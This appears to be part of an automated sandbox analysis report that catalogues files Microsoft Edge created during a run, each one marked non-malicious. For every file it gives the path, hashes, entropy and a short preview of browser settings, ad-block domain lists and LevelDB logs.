SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7Q:fwUQC5VwBIiElEd2K57P7Q
MD5:	46EC1899F11FE2F524F4A0ED857B2BF7
SHA1:	830620AD3E3FAC7FE25BD86C291A17AFA245B2CA
SHA-256:	07965BB5BA96950A38D1B7E50D9564F84D383F21D6FB17B6A411925728AF5146
SHA-512:	5496B3873B3C5FA3560593D4E3E9F43F6BFA288C5FC3B879D14269A51938D5DDAD950326D86D8DB606A34F7B235E615237136DB19539A1740CAD9B527BEBAEB2
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640136267101608
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7Q:fwUQC5VwBIiElEd2K57P7Q
MD5:	46EC1899F11FE2F524F4A0ED857B2BF7
SHA1:	830620AD3E3FAC7FE25BD86C291A17AFA245B2CA
SHA-256:	07965BB5BA96950A38D1B7E50D9564F84D383F21D6FB17B6A411925728AF5146
SHA-512:	5496B3873B3C5FA3560593D4E3E9F43F6BFA288C5FC3B879D14269A51938D5DDAD950326D86D8DB606A34F7B235E615237136DB19539A1740CAD9B527BEBAEB2
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-66DAD231-810.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.047654771530800326
Encrypted:	false
SSDEEP:	192:9kv0m5tmpnOAUZYXJPi6VBKP7+G1gsX4N1IL5kvjBzhc5NDqf+RQ9abZzNEzn8ys:Kv0Ut2tMqpuahMCmRzNW08T2RGOD
MD5:	D76F0FBA3915842E5B2FCE0DFF4450C2
SHA1:	4F997C7077DA266AF4210D6727FC824F29E81161
SHA-256:	413D48C8457193F5C00A906C55C13CB9C2C4CE03D1B4B8A3470BD54ECBDB7FB5
SHA-512:	B1AFD849FA2AB4000BC866BB5884454728DD5E30C9664765547AE0E3187B579D3C4C8908CB3DC5FB3AD57819349E5C93155D3A2DE25AED3E3374D1CFEF9955A5
Malicious:	false
Preview:	...@..@...@.....C.].....@............... k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".rvbnaf20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2......._...... .2.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.16517681506792
Encrypted:	false
SSDEEP:	3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
MD5:	C847567DEE0317368C1EC824DE025887
SHA1:	554098F22FEA9282FE1AAB35560849CD6FF546B1
SHA-256:	3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
SHA-512:	A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
Malicious:	false
Preview:	sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1bc36455-5118-45f8-8efe-db73fee6a447.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9593
Entropy (8bit):	5.111451683114912
Encrypted:	false
SSDEEP:	192:stmkdusl+eyaNP9kGw3s80bV+FE8QAnTIP9YJ:stmtsIetJfbG7Qa
MD5:	4DCABCFC28E7B5DA97767A9D85D4781E
SHA1:	9411E240D1AFD295C259A211DB0A94735E4FDC7A
SHA-256:	5EE106A325AB6193E1C351A6B70B5B844DE5806B9602A8039A2BB785636304BC
SHA-512:	ACD42CD394D3E00DCD43FC45796B2F27CFE9E3F41A5FB9F46D024A1648A78CED5C7C0A127EEB6929F53AE8AB9A620EAD7DE7A3368E19E6809D3B6A1B12D25326
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13370090291882678","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\435e1824-6fbf-4d99-84e9-dfa1b8bf6ead.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10186
Entropy (8bit):	5.208736599511447
Encrypted:	false
SSDEEP:	192:stmkdusl+eyaNPcLHREkGw3s80bV+FE8QAlTIP9YJ:stmtsIetJcsbG7QU
MD5:	955E534BAD56C0CF10AA6E3E2E2D6484
SHA1:	9F966431CA6A692FA3FE05766B82C4726A69330E
SHA-256:	D919EB2D1D5938EA47150FA9AEEF889A9E17A24519D211C5E20DCC5F451FA938
SHA-512:	C8E522726D0E63FAE3BD924482C10C4F414E2F5E85B7A744C2F94500A2425CD8E447865902C0806B5164ED9F21E777FB328CD3494F043532C2750BC5189171F9
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13370090291882678","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8dba3761-ed0c-4a5e-ae0e-ea6535976ba4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	30244
Entropy (8bit):	5.565772541995448
Encrypted:	false
SSDEEP:	768:9xdWJ37pLGLvxUWPnjf6I8F1+UoAYDCx9Tuqh0VfUC9xbog/OVErvJ5KYrwVSLnN:9xdWJxcvxUWPnjf6Iu1jaNrvzKJ4Jt9
MD5:	EB84E07ABC1583D0B0B4CB64021313B5
SHA1:	344FD9FDA2BCF73BB510FE34B9F2B54169809183
SHA-256:	564B160D7E8804FAEE570CE15BC512114C73FB6294A2EF785DD5E783D1D4BB14
SHA-512:	59A043359CB57226E90F76A97389DC6C278C4C268EE087B918DEF54113154801D0035FD0CDE5172371108DC704AC628DE7C10EDD162D71EFDBCE9DAA4EAF83BE
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13370090291242821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13370090291242821","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	416960
Entropy (8bit):	5.112622239901996
Encrypted:	false
SSDEEP:	1536:kQ60h81vrPI3lFRAbYbiOWIwatxI2Lp8NCIFu47Z38WJ5+R8Mm6EW9uU8ywMsF91:k2AjPaENR+RrmVlrfKNlk/lOlWfEwVCw
MD5:	B0B6CC62F15539B8D3217F16A0AC3B01
SHA1:	82D0A4E62C3FF0257EA82A4FE61F43F9C5985A1A
SHA-256:	D5742A5641FE63D3F35DFCA7FD4FD8F6F91DCD480E6C6C44938A3D2C0AF4BB7B
SHA-512:	4A671E8C5AEAB66BCA12D1817E5788205BE6847716751DE3A6F937F290F1CEDF8C59E81CBF8C8CE7D4206A57A9B8749DE1B155996810E9B5003609C9996416BC
Malicious:	false
Preview:	...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4...13340965219355520.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.15070064517949
Encrypted:	false
SSDEEP:	6:PY639+q2PcNwi23oH+Tcwt9Eh1tIFUt82YzZmw+2Y2VkwOcNwi23oH+Tcwt9Eh1H:PP34vLZYeb9Eh16FUt82E/+2f54ZYebY
MD5:	F0318F3418176F9246CAA58134BE4B3A
SHA1:	09229E309410C6CE9F2CD8C4A683DB745C89E035
SHA-256:	E0F1F43B9B9E7C6FC4F208A1DA5B36E8D63EEBD159F3614FE590E510556521CA
SHA-512:	F9761302EE16DD64AD98EFB45DC6D2420F5E815A79E80829DC622FA71FF32F186764BF5138FD1AEC6193B3C4B5DF935842FFBC79F598E67C0105C9D276E44217
Malicious:	false
Preview:	2024/09/06-06:01:16.914 7e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/09/06-06:01:16.915 7e8 Recovering log #3.2024/09/06-06:01:16.918 7e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.15070064517949
Encrypted:	false
SSDEEP:	6:PY639+q2PcNwi23oH+Tcwt9Eh1tIFUt82YzZmw+2Y2VkwOcNwi23oH+Tcwt9Eh1H:PP34vLZYeb9Eh16FUt82E/+2f54ZYebY
MD5:	F0318F3418176F9246CAA58134BE4B3A
SHA1:	09229E309410C6CE9F2CD8C4A683DB745C89E035
SHA-256:	E0F1F43B9B9E7C6FC4F208A1DA5B36E8D63EEBD159F3614FE590E510556521CA
SHA-512:	F9761302EE16DD64AD98EFB45DC6D2420F5E815A79E80829DC622FA71FF32F186764BF5138FD1AEC6193B3C4B5DF935842FFBC79F598E67C0105C9D276E44217
Malicious:	false
Preview:	2024/09/06-06:01:16.914 7e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/09/06-06:01:16.915 7e8 Recovering log #3.2024/09/06-06:01:16.918 7e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	636554
Entropy (8bit):	6.0127694795093625
Encrypted:	false
SSDEEP:	12288:BhjHVMIvgjD8xIXualvzHR7iaQKR+8JbtlmkdBC1esJxrVcQNaiBa:Bhq+kaIXnQs+Qb3mkGbJo5
MD5:	CDE9ABB05D9CF09C0DA933480FEC3B64
SHA1:	D28F62243CA290594B0EB556FE0831AA6FCC6C8A
SHA-256:	036961C14225D6DD3397D4EA5B38D010A7F0EE778CFDBEFE9437F37DDE78E39F
SHA-512:	FFD65D76C5DF99F63EDE9695B15CE7D3AD175FB87AD8C708DDBBF5E3747379CBCA0F30C5146E7EE1A86037DB96A63F36AAAD5606D6D95BF45022E3024BF2F018
Malicious:	false
Preview:	...m.................DB_VERSION.1.!Z2.................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":3767945,"primeBases":[5381,5381,5381,5381],"supportedDomains":"+o3+RncW1oGSCAJdFuTFqUW6YaGaAbCC0mXuZLc6TAdWf+a3VWHilOI7HUSutZN7jjBKd4Xi34zSVDgDggvk4iE7SFOUe0to/ca2Z9NKMxb3353s+Xz5MJEyQlwFGH9Q4NPsSG7/Mg0OzIizAAoQKAb68INGxcqMD8b8cjATmbZA8J3gaDgCBh+FwkLSt7ItZOvFiz1UWGdFoGeWLVoid0mXBF1tVxiUsnfZrTOYUq+ybxegQgLR7oDn/09U0naczNrckPPeVov9TOq080La20glc39nrbTQ161ERvbKrN6QBMsgiTOHVfZfSTGNbPb7sPb+5dDTy5Pj4SDC6TCZj8jX3zHAoaELBAojh3rXGAdRcmlzljl/F2zoyuFBIUzr1kW7W1ersVw2uiPbjdETQ6f6PzQr5AIUQSnGkCAK4eY8TDM6HLdxH8VjohD4l8UWF3Y9XOks322TYQmhq7J/I5qw0+ibgaYj2D0vvNSxCuIJMAcBjJAiV3jSfyJZCI7hs3VWZSRjobGr+J4EqQa3vtIovMi1uA9KKefV9pM81NjK5N2TORH5BQe9Np+dJNRjevW/vXAW4n+oqu76r1jaC4FKAy9+Xb5xIFPlpZDNzVhz/6/ct6Hct8kU9B96g6Gv3o9/8jKq///viYVNKvcp+tGhn40YSm6uaOjATydJjaZqudEoej2VEh/hMKMwBMZNV2DvJuxJfXP9Vxyc06+ZH2XLctB6KM125+jdQ7UtY9dujxJcJ6P5ONGgAQohAe9Jqk8wYOnC5u/cDvlnwhGVt8QSnkPqM+ce4mL

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	636529
Entropy (8bit):	6.012178686683981
Encrypted:	false
SSDEEP:	12288:vhEHVMavgBg8bIXuHlvzHM7iawKRt8AbtA0kdBO1esJxLVcWGaiQX:vh7cNaIXxwstXb+0kKbJ1l
MD5:	D06FF4898FA4B70F70844C78C74E85F1
SHA1:	343AACAE98E528494912A7795CFDA3320598B8B9
SHA-256:	7075C56053C9821ACF183DBB7CF38F0EB58DED5773450E7FC5D015DAF9885A11
SHA-512:	ADD667D77284908B8DE405827BA3BFA0D56A8E19DEC93D4E3B5CB6731001D86AA65899CEC389DDC0D50D40A95DFBFEF10838C3BB3E565330EE72F7E5C43A1AC1
Malicious:	false
Preview:	....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":3767945,"primeBases":[5381,5381,5381,5381],"supportedDomains":"+o3+RncW1oGSCAJdFuTFqUW6YaGaAbCC0mXuZLc6TAdWf+a3VWHilOI7HUSutZN7jjBKd4Xi34zSVDgDggvk4iE7SFOUe0to/ca2Z9NKMxb3353s+Xz5MJEyQlwFGH9Q4NPsSG7/Mg0OzIizAAoQKAb68INGxcqMD8b8cjATmbZA8J3gaDgCBh+FwkLSt7ItZOvFiz1UWGdFoGeWLVoid0mXBF1tVxiUsnfZrTOYUq+ybxegQgLR7oDn/09U0naczNrckPPeVov9TOq080La20glc39nrbTQ161ERvbKrN6QBMsgiTOHVfZfSTGNbPb7sPb+5dDTy5Pj4SDC6TCZj8jX3zHAoaELBAojh3rXGAdRcmlzljl/F2zoyuFBIUzr1kW7W1ersVw2uiPbjdETQ6f6PzQr5AIUQSnGkCAK4eY8TDM6HLdxH8VjohD4l8UWF3Y9XOks322TYQmhq7J/I5qw0+ibgaYj2D0vvNSxCuIJMAcBjJAiV3jSfyJZCI7hs3VWZSRjobGr+J4EqQa3vtIovMi1uA9KKefV9pM81NjK5N2TORH5BQe9Np+dJNRjevW/vXAW4n+oqu76r1jaC4FKAy9+Xb5xIFPlpZDNzVhz/6/ct6Hct8kU9B96g6Gv3o9/8jKq///viYVNKvcp+tGhn40YSm6uaOjATydJjaZqudEoej2VEh/hMKMwBMZNV2DvJuxJfXP9Vxyc06+ZH2XLctB6KM125+jdQ7UtY9dujxJcJ6P5ONGgAQohAe9Jqk8wYOnC5u/cDvlnwhGVt8QSnkPqM+ce4mLoqavVr1W6M2pkmSIpauEh0cez8hN+5N/u78l15yvzNT5

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354080289512148
Encrypted:	false
SSDEEP:	6144:/A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:/FdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	41B2353DA1FEBC9CB0CA0A5C90668210
SHA1:	FB5FBD3C0C16A265A9AA4C43AFB23A257BD6B0AD
SHA-256:	60BDF8B09FE94E963636E079EB6CCD81F3982E57A9370C95885CB7B1968165E0
SHA-512:	01E6CC8590786D6BD2A4536B3B6ED135415CC3BBFDD1FD86A3CB502BF90A1B092137EE4B829DDE023E3013F76CDD38BA8AB6FCB3B6F3963DDCAB65D2B2469703
Malicious:	false
Preview:	...m.................DB_VERSION.1.OwLq...............&QUERY_TIMESTAMP:domains_config_gz2...13370090303058595..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.179315386806463
Encrypted:	false
SSDEEP:	6:Pt8oYRoM1cNwi23oH+Tcwtk2WwnvB2KLllt2/Iq2PcNwi23oH+Tcwtk2WwnvIFUv:PtRYRo2ZYebkxwnvFLnt2QvLZYebkxwp
MD5:	AA993C9FF35E895975DFBA1D3A4D3FC8
SHA1:	F6F60BFF8D5A8522CA79AEF34C5564CDC09DCCC0
SHA-256:	C2E4947AD4D68D0FCB7E36310C02C4B1FD99DE8DDBE4D874D9E70B10F46F2CE7
SHA-512:	44ED30E0AD82D42EDC64CA27F5508331AE09CCB066D7007B63A32DF6EE62544AD351806280F5B076E8324868FD1E36DC74B0F7D7CB32DCE2E1A05D8098DFBBEE
Malicious:	false
Preview:	2024/09/06-05:58:21.424 11d4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/09/06-05:58:21.480 11d4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

